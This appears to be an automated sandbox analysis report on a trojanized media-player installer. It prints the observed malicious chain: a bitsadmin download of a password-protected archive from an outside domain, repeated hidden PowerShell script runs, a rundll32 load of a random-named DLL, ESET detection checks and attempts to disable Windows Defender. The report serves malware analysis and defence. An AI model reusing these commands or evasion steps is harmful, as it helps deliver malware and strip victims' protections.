Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 18, 2021, 10:05 a.m. | May 18, 2021, 10:07 a.m. |
-
-
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1976 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2300 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1788 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2740 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2680 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2092 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2488 -
bitsadmin.exe "bitsadmin" /Transfer helper http://moonlabmediacompany.com/data/data.7z C:\zip.7z
872 -
data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZerFyxswOU1kSPo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
732 -
data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pi9YcQvhaRhVM6Jx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
2608 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2892 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2420 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
3068 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
3064 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1332 -
rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
772-
rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
1868
-
-
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1896 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1888 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
2708 -
powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
1308
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
moonlabmediacompany.com | 89.221.213.3 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
section | .ndata |
request | HEAD http://moonlabmediacompany.com/data/data.7z |
request | GET http://moonlabmediacompany.com/data/data.7z |
file | C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\System.dll |
file | C:\Program Files (x86)\lighteningplayer\libssp-0.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk |
file | C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll |
file | C:\Program Files\temp_files\data.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\libvlc.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll |
file | C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk |
file | C:\Users\test22\Desktop\Lightening Media Player.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\한컴오피스 한글 2010.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chrome.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\한컴 사전.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Lightening Media Player.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Lightening Media Player.lnk |
file | C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk |
cmdline | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1" |
file | C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\System.dll |
file | C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\Dialer.dll |
file | C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\nsExec.dll |
wmi | select * from Win32_processor |
section | {u'size_of_data': u'0x00006a00', u'virtual_address': u'0x0000b000', u'entropy': 7.299408808107717, u'name': u'.rdata', u'virtual_size': u'0x000069d8'} | entropy | 7.29940880811 | description | A section with a high entropy has been found |
process | sunlabsplayer.exe |
cmdline | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1" |
wmi | select * from Win32_processor |
registry | HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\ESET |
registry | HKEY_CURRENT_USER\SOFTWARE\ESET |
registry | HKEY_CURRENT_USER\HKEY_CURRENT_USER\SOFTWARE\ESET |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\ESET |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths |
cmdline | "bitsadmin" /Transfer helper http://moonlabmediacompany.com/data/data.7z C:\zip.7z |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | ||||||
description | attempts to modify windows defender policies | registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{0504A941-FA89-4072-957C-5A1622CCE09F}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware |